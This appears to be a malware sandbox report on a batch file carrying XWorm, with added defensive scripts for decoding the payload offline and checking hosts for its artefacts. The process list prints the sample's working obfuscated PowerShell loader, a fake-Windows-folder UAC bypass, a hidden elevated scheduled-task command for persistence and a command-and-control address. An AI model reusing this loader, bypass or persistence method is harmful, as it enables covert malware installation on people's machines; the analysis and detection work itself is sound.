Analysis Overview
SHA256
5baff04fad6153b7debb8003997edf677cd677263af4ab9e95510e225401ccde
Threat Level: Known bad
The file RoWare.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-09 23:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-09 23:13
Reported
2024-06-09 23:17
Platform
win10-20240404-en
Max time kernel
80s
Max time network
135s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows \System32\ComputerDefaults.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RoWare.bat"
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2SAi3wOvnkUFLRYxrM1Aug=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bjuhq=New-Object System.IO.MemoryStream(,$param_var); $lHqpc=New-Object System.IO.MemoryStream; $ZhWoP=New-Object System.IO.Compression.GZipStream($bjuhq, [IO.Compression.CompressionMode]::Decompress); $ZhWoP.CopyTo($lHqpc); $ZhWoP.Dispose(); $bjuhq.Dispose(); $lHqpc.Dispose(); $lHqpc.ToArray();}function execute_function($param_var,$param2_var){ $DjkcC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tpQof=$DjkcC.EntryPoint; $tpQof.Invoke($null, $param2_var);}$adpqO = 'C:\Users\Admin\AppData\Local\Temp\RoWare.bat';$host.UI.RawUI.WindowTitle = $adpqO;$cSfZG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($adpqO).Split([Environment]::NewLine);foreach ($zHjor in $cSfZG) { if ($zHjor.StartsWith('dxmcSvpkIMoaFKFAdSEr')) { $kULPw=$zHjor.Substring(20); break; }}$payloads_var=[string[]]$kULPw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\RoWare')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
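The powershell.exe command line above is the whole loader: it reads RoWare.bat back from disk, finds the line that starts with the 20-character marker dxmcSvpkIMoaFKFAdSEr, splits what follows on '\', undoes a '#'/'@' substitution, base64-decodes, AES-CBC-decrypts with the embedded key and IV, gunzips, and hands the result to Assembly.Load. The following script is an added example, not part of this report or of the sample: it runs the same pipeline offline and writes the two stages to disk instead of loading them. The marker, key and IV are copied from this command line; other builds of the loader use different values, which is why they are parameters. The method names appear reversed ('gnirtS46esaBmorF' is 'FromBase64String', 'txeTllAdaeR' is 'ReadAllText', 'daoL' is 'Load'); the helper at the top resolves them.

```powershell
# Added example: offline decoder for the two-stage payload carried inside RoWare.bat.
# Reproduces the decrypt -> gunzip pipeline from the observed powershell.exe command
# line, but writes each stage to disk instead of Assembly.Load + EntryPoint.Invoke.
# Marker, key and IV are copied from this report's command line; other builds of the
# same loader use different values, so they are parameters rather than constants.
param(
    [Parameter(Mandatory)] [string] $BatPath,
    [string] $OutDir = (Join-Path $PWD 'roware_stages'),
    [string] $Marker = 'dxmcSvpkIMoaFKFAdSEr',
    [string] $KeyB64 = 'jiNE3E2FLDv+NKiKFH8uo69QT6nLdIqdGCpMMEmvmwY=',
    [string] $IvB64  = '2SAi3wOvnkUFLRYxrM1Aug=='
)

# The loader hides .NET method names as reversed strings indexed backwards,
# e.g. 'gnirtS46esaBmorF'[-1..-16] -join ''. This undoes that for the analyst.
function Resolve-ReversedName([string] $s) { -join $s[-1..-($s.Length)] }

function Decrypt-Stage([byte[]] $Cipher, [byte[]] $Key, [byte[]] $Iv) {
    # AES-CBC with PKCS7 padding, as in the loader's decrypt_function.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $Iv
        $dec = $aes.CreateDecryptor()
        # Leading comma keeps the byte[] from being unrolled on output.
        try { return ,$dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Gzip([byte[]] $Data) {
    # GZip inflate, as in the loader's decompress_function.
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# Show what the reversed names in the command line actually call.
'gnirtS46esaBmorF', 'txeTllAdaeR', 'daoL' | ForEach-Object {
    '{0,-18} -> {1}' -f $_, (Resolve-ReversedName $_)
}

$key  = [Convert]::FromBase64String($KeyB64)
$iv   = [Convert]::FromBase64String($IvB64)
$full = (Resolve-Path -LiteralPath $BatPath).ProviderPath

# The loader reads its own .bat and takes the first line starting with the marker;
# everything after the marker is the payload container.
$line = [System.IO.File]::ReadAllLines($full) |
    Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $line) { throw "marker '$Marker' not found in $full" }
$container = $line.Substring($Marker.Length)

# Two stages separated by '\'. '#' stands for '/' and '@' for 'A' so the blob does
# not look like plain base64 to a carver; undo the substitution before decoding.
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$i = 0
foreach ($stage in $container.Split('\')) {
    $i++
    $cipher = [Convert]::FromBase64String($stage.Replace('#', '/').Replace('@', 'A'))
    [byte[]] $plain = Expand-Gzip (Decrypt-Stage $cipher $key $iv)
    $path = Join-Path $OutDir ('stage{0}.bin' -f $i)
    [System.IO.File]::WriteAllBytes($path, $plain)
    # A decoded .NET assembly starts with the 'MZ' DOS header.
    $isPe = ($plain.Length -ge 2) -and ($plain[0] -eq 0x4D) -and ($plain[1] -eq 0x5A)
    '{0}: {1} bytes, MZ header: {2}, SHA256: {3}' -f $path, $plain.Length, $isPe,
        (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
}
```

Run it as `.\Decode-RoWare.ps1 -BatPath .\RoWare.bat` in an isolated analysis VM; the stage*.bin files can then be examined with a .NET disassembler without ever executing them. In the original command line stage 1 is invoked with no arguments and stage 2 with an empty string[], which is consistent with a standard .NET Main(string[]) entry point, so expect stage 2 to be the assembly that carries the XWorm behaviour flagged in the signatures.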
Network
| Country | Destination | Domain | Proto |
| NL | 91.92.250.4:2709 | | tcp |
| US | 8.8.8.8:53 | 4.250.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| NL | 91.92.250.4:2709 | | tcp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
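The process tree and network table together give four host-side artefacts worth checking for on a suspected victim: a directory literally named "Windows " (trailing space) under C:\, which is what lets "C:\Windows \System32\ComputerDefaults.exe" pass for the auto-elevating system binary, the hidden highest-privilege logon task 'OneNote startup_str' whose action is '$phantom-SCV.cmd' under AppData\Roaming, that dropped .cmd itself, and TCP connections to 91.92.250.4:2709. The script below is an added example, not part of this report: a read-only PowerShell triage that looks for each of them. The scheduled-task check generalises beyond this sample to any task with the same shape (RunLevel Highest and an action under a user-writable path); the task name, file name and C2 address are this report's IOCs and will differ in other builds.

```powershell
# Added example: read-only host triage for the RoWare/XWorm artefacts in this report.
# It reports findings; it does not delete or kill anything. Names and the C2 address
# are the ones observed in this detonation and will differ for other builds.
$C2Address    = '91.92.250.4'
$C2Port       = 2709
$TaskName     = 'OneNote startup_str'
$DroppedCmd   = 'AppData\Roaming\$phantom-SCV.cmd'   # single quotes: '$phantom' is literal
$UserWritable = @('\AppData\', '\Temp\', '\ProgramData\', '\Users\Public\')

function Find-MockTrustedDirectories {
    # "C:\Windows \System32\..." only works because a directory named "Windows "
    # (trailing space) exists beside the real one. Enumerate actual names rather than
    # calling Test-Path, so no path normalisation can trim the space away.
    Get-ChildItem -LiteralPath 'C:\' -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ne ($_.Name -replace '[ .]+$', '') } |
        ForEach-Object {
            [pscustomobject]@{
                Check  = 'MockTrustedDirectory'
                Detail = '"{0}" (displays like "{1}")' -f $_.FullName, ($_.Name -replace '[ .]+$', '')
            }
        }
}

function Find-SuspiciousScheduledTasks {
    # The loader registered a hidden, highest-privilege logon task whose action lives
    # under a user profile. Flag the known name and any task with that shape.
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            $exe    = [string]$action.Execute
            $argStr = [string]$action.Arguments
            $cmd    = $exe + ' ' + $argStr
            $fromUserPath = @($UserWritable | Where-Object { $cmd -like "*$_*" }).Count -gt 0
            $known = $task.TaskName -eq $TaskName
            if ($known -or ($fromUserPath -and $task.Principal.RunLevel -eq 'Highest')) {
                $check = 'ElevatedTaskFromUserPath'
                if ($known) { $check = 'KnownTaskName' }
                [pscustomobject]@{
                    Check  = $check
                    Detail = '{0}{1} -> {2} (RunLevel={3}, Hidden={4})' -f $task.TaskPath, $task.TaskName,
                             $cmd.Trim(), $task.Principal.RunLevel, $task.Settings.Hidden
                }
            }
        }
    }
}

function Find-DroppedPersistenceScript {
    # The task action points into one user's roaming profile; check every profile.
    Get-ChildItem -LiteralPath 'C:\Users' -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Join-Path $_.FullName $DroppedCmd
        if (Test-Path -LiteralPath $p) {
            [pscustomobject]@{ Check = 'DroppedCmd'; Detail = $p }
        }
    }
}

function Find-C2Connections {
    # Live sockets only; a beacon that is between check-ins will not show here.
    Get-NetTCPConnection -RemoteAddress $C2Address -RemotePort $C2Port -ErrorAction SilentlyContinue |
        ForEach-Object {
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Check  = 'C2Connection'
                Detail = '{0}:{1} state={2} pid={3} ({4})' -f $_.RemoteAddress, $_.RemotePort,
                         $_.State, $_.OwningProcess, $proc.ProcessName
            }
        }
}

$findings = @(Find-MockTrustedDirectories) + @(Find-SuspiciousScheduledTasks) +
            @(Find-DroppedPersistenceScript) + @(Find-C2Connections)
if ($findings.Count -eq 0) { 'No RoWare/XWorm artefacts found.' }
else { $findings | Format-Table -AutoSize -Wrap }
```

Run it from an elevated prompt, since Get-ScheduledTask only lists every task and Get-NetTCPConnection only attributes owning processes when run as an administrator. A hit on MockTrustedDirectory is significant on its own: Windows Explorer and most tools strip the trailing space when displaying the name, so the fake "Windows " folder is easy to miss by eye, and the sample's own `rmdir "c:\Windows \" /s /q` step shows the operators expect to clean it up after the elevated launch.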
Files
memory/4568-5-0x0000028A3F370000-0x0000028A3F392000-memory.dmp
memory/4568-4-0x00007FFA77893000-0x00007FFA77894000-memory.dmp
memory/4568-35-0x0000028A3F530000-0x0000028A3F56C000-memory.dmp
memory/4568-47-0x0000028A3FBE0000-0x0000028A3FC56000-memory.dmp
memory/4568-46-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ul3ybabr.j1q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4568-12-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-56-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-57-0x0000028A3F3D0000-0x0000028A3F3E0000-memory.dmp
memory/4568-59-0x00007FFA93EE0000-0x00007FFA93F8E000-memory.dmp
C:\Windows \System32\ComputerDefaults.exe
| MD5 | 56d03e4218082266a9cdd8600537d891 |
| SHA1 | c153719f971dcee8f6985d7c79f64fc88dd8663c |
| SHA256 | 210d5714497505022aa068167f7ed5bb826abcf53cfe741c9860a2c8dce3f54a |
| SHA512 | f2c64a4dbab789635bf97b3d615fcc96dfe8c4094b67a464eb34bc84501eb7648e7fa692971e917c1ebfac0548187721ecc552aaad35767f8a40846d922613d3 |
memory/4568-74-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-67-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-60-0x0000028A3FE40000-0x0000028A3FE8C000-memory.dmp
memory/4568-58-0x00007FFA94510000-0x00007FFA946EB000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 90721248abf6fb303c58a4f6b894e5a8 |
| SHA1 | e6b54550c25ac1a98fdb6216b1995dbffd0cb13e |
| SHA256 | 229e10e8ea4a8d547221c7fbb2f95b427473b931ba9a50d57102c1384cb08a1f |
| SHA512 | b8fbfba910f0483410f69f206af3b9ad239e97421833e706178a04c63fe5c32b81d4b9662d1f22cde9d6566aa22aaa876374f7a8b3f6726f08937e79407c7980 |
memory/3884-162-0x0000000000CD0000-0x0000000000CFA000-memory.dmp
memory/4568-172-0x0000028A3FFA0000-0x0000028A3FFB4000-memory.dmp
memory/3884-176-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1564-179-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2160-181-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1172-184-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2144-199-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1132-202-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1524-204-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2472-211-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1264-215-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/68-216-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/900-212-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2292-210-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1668-209-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/3480-208-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2496-207-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1852-206-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/3840-205-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1516-203-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/348-201-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/744-200-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/2520-183-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1768-182-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1180-180-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/392-178-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/1152-177-0x00007FFA545A0000-0x00007FFA545B0000-memory.dmp
memory/4568-254-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-253-0x00007FFA77893000-0x00007FFA77894000-memory.dmp
memory/4568-258-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-259-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp
memory/4568-260-0x0000028A40350000-0x0000028A4035C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpB0D8.tmp.bat
| MD5 | 316bdc980c78c4fbf5e6852ebab08d5b |
| SHA1 | e4c486ab6a9748cb7130bf46cee4359b838dcfd8 |
| SHA256 | a12b64ab319db0958ec22d881d859fe7432d8b28e887a355f3c71b805dbafb0a |
| SHA512 | bcb772a9e8fa2def85ee6655fff62e22a403371bb09906a5931fd25ef00cdd941cca007273189bc6f4bb835d5641102e4f80af6bd0994a6829157c79f18dcb70 |
memory/4568-266-0x00007FFA77890000-0x00007FFA7827C000-memory.dmp